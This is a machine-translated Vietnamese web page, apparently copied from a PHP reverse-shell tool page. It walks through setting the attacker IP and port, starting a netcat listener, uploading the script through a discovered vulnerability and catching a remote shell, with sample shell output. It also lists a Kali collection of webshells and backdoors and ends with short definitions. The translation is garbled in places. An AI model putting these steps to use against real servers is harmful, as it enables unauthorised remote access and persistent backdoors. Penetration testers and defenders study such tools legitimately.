Vỏ php đơn giản

Công cụ này được thiết kế cho những trường hợp trong quá trình dồn nén khi bạn có quyền truy cập tải lên máy chủ web đang chạy PHP. Tải tập lệnh này lên một nơi nào đó trong thư mục gốc của web rồi chạy tập lệnh đó bằng cách truy cập URL thích hợp trong trình duyệt của bạn. Tập lệnh sẽ mở kết nối TCP gửi đi từ máy chủ web đến máy chủ và cổng bạn chọn. Bị ràng buộc với kết nối TCP này sẽ là một trình bao

Đây sẽ là một vỏ tương tác phù hợp, trong đó bạn có thể chạy các chương trình tương tác như telnet, ssh và su. Nó khác với trình bao dựa trên biểu mẫu web cho phép bạn gửi một lệnh duy nhất, sau đó trả lại cho bạn kết quả đầu ra

Tải xuống

php-reverse-shell-1. 0. hắc ín. gz

MD5sum. 2bdf99cee7b302afdc45d1d51ac7e373

SHA1sum. 30a26d5b5e30d819679e0d1eb44e46814892a4ee

Băng hình

Tôi tình cờ xem được video này do ai đó làm bằng php-reverse-shell

Cập nhật 2011-11. Imax đã gửi cho tôi một liên kết đến công cụ fimap của anh ấy sử dụng php-reverse-shell. Trông mát mẻ

đi qua

sửa đổi nguồn

Để ngăn người khác lạm dụng backdoor của bạn – một kịch bản ác mộng trong khi pentesting – bạn cần sửa đổi mã nguồn để chỉ ra nơi bạn muốn trình bao đảo ngược quay trở lại. Chỉnh sửa các dòng sau của php-reverse-shell. php

$ip = '127.0.0.1';  // CHANGE THIS
$port = 1234;       // CHANGE THIS

Hãy sẵn sàng để bắt vỏ ngược

Bắt đầu trình nghe TCP trên máy chủ và cổng mà máy chủ web có thể truy cập được. Sử dụng cùng một cổng ở đây như bạn đã chỉ định trong tập lệnh [1234 trong ví dụ này]

$ nc -v -n -l -p 1234

Tải lên và chạy tập lệnh

Sử dụng bất kỳ lỗ hổng nào bạn đã phát hiện ra trên trang web, tải lên php-reverse-shell. php. Chạy tập lệnh đơn giản bằng cách duyệt đến tệp mới tải lên trong trình duyệt web của bạn [NB. Bạn sẽ không thấy bất kỳ đầu ra nào trên trang web, nó sẽ chỉ bị treo nếu thành công]

//somesite/php-reverse-shell.php

Tận hưởng lớp vỏ mới của bạn

Nếu mọi việc suôn sẻ, máy chủ web sẽ gửi lại trình bao cho trình nghe netcat của bạn. Một số lệnh hữu ích như w, uname -a, id và pwd được chạy tự động cho bạn

$ nc -v -n -l -p 1234
listening on [any] 1234 ...
connect to [127.0.0.1] from [UNKNOWN] [127.0.0.1] 58012
Linux somehost 2.6.19-gentoo-r5 #1 SMP PREEMPT Sun Apr 1 16:49:38 BST 2007 x86_64 AMD Athlon[tm] 64 X2 Dual Core Processor 4200+ AuthenticAMD GNU/Linux
 16:59:28 up 39 days, 19:54,  2 users,  load average: 0.18, 0.13, 0.10
USER     TTY        LOGIN@   IDLE   JCPU   PCPU WHAT
root   :0        19May07 ?xdm?   5:10m  0.01s /bin/sh
uid=81[apache] gid=81[apache] groups=81[apache]
sh: no job control in this shell
sh-3.2$

câu hỏi thường gặp

Khi nào điều này hữu ích?

Có lẽ các khu vực duy nhất trên đĩa mà bạn có quyền ghi vào được gắn với tùy chọn “noexec”. Tải lên một chương trình đã biên dịch sẽ không được sử dụng trong những tình huống này. Bạn cần sử dụng ngôn ngữ kịch bản đã cài đặt như Python, PERL, PHP, v.v.
Có lẽ bạn không muốn tải lên chương trình thứ hai.

Không phải kết nối trình bao sẽ bị cắt đứt khi máy chủ web hết thời gian chạy tập lệnh PHP sao?

Không. Nó dường như không có trên các hệ thống mà tôi đã thử nghiệm [cho đến nay chỉ có Gentoo Linux]. Ngoài ra, tập lệnh PHP cố gắng tự daemon hóa và tách khỏi quy trình gốc để tránh điều này [mặc dù nó hiếm khi hoạt động trong thực tế]. Trình duyệt của bạn sẽ bị treo khi bạn truy cập trình bao đảo ngược. điều này là bình thường. Bạn có thể nhấn hủy trong trình duyệt của mình sau khi bạn đã có vỏ của mình

Không phải sẽ có một quy trình shell trông khá đáng ngờ khi quản trị viên chạy “ps” sao?

Ừ. Phiên bản vỏ ngược này không tinh tế lắm

apache   28106  0.0  0.0  10428  1216 ?        S    17:15   0:00 sh -c uname -a; w; id; /bin/sh -i
apache   28110  0.0  0.0  10172  1428 ?        S    17:15   0:00 /bin/sh -i

Trang này có sẵn bằng tiếng Serbo-Croatia không?

Đúng. Cảm ơn Jovana Milutinovich đã dịch

Hãy cẩn thận

Tường lửa gửi đi [còn gọi là lọc đầu ra] có thể ngăn kết nối shell ngược của bạn đến được với bạn. Chọn một cổng được phép thông qua Tường lửa. Nếu không có, bạn sẽ phải thực hiện với trình bao PHP dựa trên biểu mẫu

Việc triển khai cụ thể này của trình bao đảo ngược dựa trên unix. Bạn sẽ cần sửa đổi nó trước khi nó hoạt động trên windows

Tôi đã nhận thấy một vài quy trình xác sống khi thử nghiệm trình bao này. Điều đó không phải lúc nào cũng xảy ra, nhưng có lẽ là điều được mong đợi vì chúng ta không trang bị cho mình đúng cách

Ví dụ về cách sử dụng Webshells

[email protected]:~# tree /usr/share/webshells/
/usr/share/webshells/
├── asp
│   ├── cmd-asp-5.1.asp
│   └── cmdasp.asp
├── aspx
│   └── cmdasp.aspx
├── cfm
│   └── cfexec.cfm
├── jsp
│   ├── cmdjsp.jsp
│   └── jsp-reverse.jsp
├── perl
│   ├── perlcmd.cgi
│   └── perl-reverse-shell.pl
└── php
    ├── findsock.c
    ├── php-backdoor.php
    ├── php-findsock-shell.php
    ├── php-reverse-shell.php
    ├── qsd-php-backdoor.php
    └── simple-backdoor.php

6 directories, 14 files
[email protected]:~#

Một bộ sưu tập webshell cho các máy chủ ASP, ASPX, CFM, JSP, Perl và PHP

Kích thước cài đặt. 71 KB
Cách cài đặt. sudo apt install webshells

phụ thuộc.
[email protected]:~# webshells -h

> webshells ~ Collection of webshells

/usr/share/webshells
|-- asp
|-- aspx
|-- cfm
|-- jsp
|-- laudanum -> /usr/share/laudanum
|-- perl
|-- php
`-- seclists -> /usr/share/seclists/Web-Shells

cập nhật vào. 2022-Aug-05

Vỏ web PHP đơn giản là gì?

Web shell là một ứng dụng nhỏ mà kẻ tấn công chạy trên máy chủ web của bạn . Sau đó, họ có thể sử dụng ứng dụng này để truy cập từ xa vào máy chủ của bạn và chạy các lệnh trên đó. Bản thân vỏ web không bao giờ là một cuộc tấn công, nó là hậu quả của một cuộc tấn công thành công vào trang web hoặc ứng dụng web của bạn.

Trình bao PHP là gì?

PHP Shell hoặc Shell PHP là một chương trình hoặc tập lệnh được viết bằng PHP [Bộ tiền xử lý siêu văn bản Php] cung cấp Linux Terminal [Shell là một khái niệm rộng hơn nhiều] trong Trình duyệt. PHP Shell lets you to execute most of the shell commands in browser, but not all due to its limitations.

Cửa hậu PHP là gì?

Cửa sau. PHP/Obfu cho phép truy cập trái phép vào hệ thống máy tính . Nó là một công cụ truy cập từ xa cho phép tin tặc truy cập vào một máy tính bị xâm nhập, thường là qua cổng TCP hoặc UDP. Cửa hậu thường là các tệp độc lập tự cài đặt vào hệ thống sau khi chúng được chạy.

một vỏ web là gì đưa ra một ví dụ?

Web shell là các tập lệnh độc hại cho phép các tác nhân đe dọa xâm phạm máy chủ web và khởi chạy các cuộc tấn công bổ sung . Trước tiên, các tác nhân đe dọa xâm nhập hệ thống hoặc mạng, sau đó cài đặt trình bao web. Từ thời điểm này trở đi, họ sử dụng nó như một cửa hậu vĩnh viễn vào các ứng dụng web được nhắm mục tiêu và bất kỳ hệ thống được kết nối nào.

Chủ Đề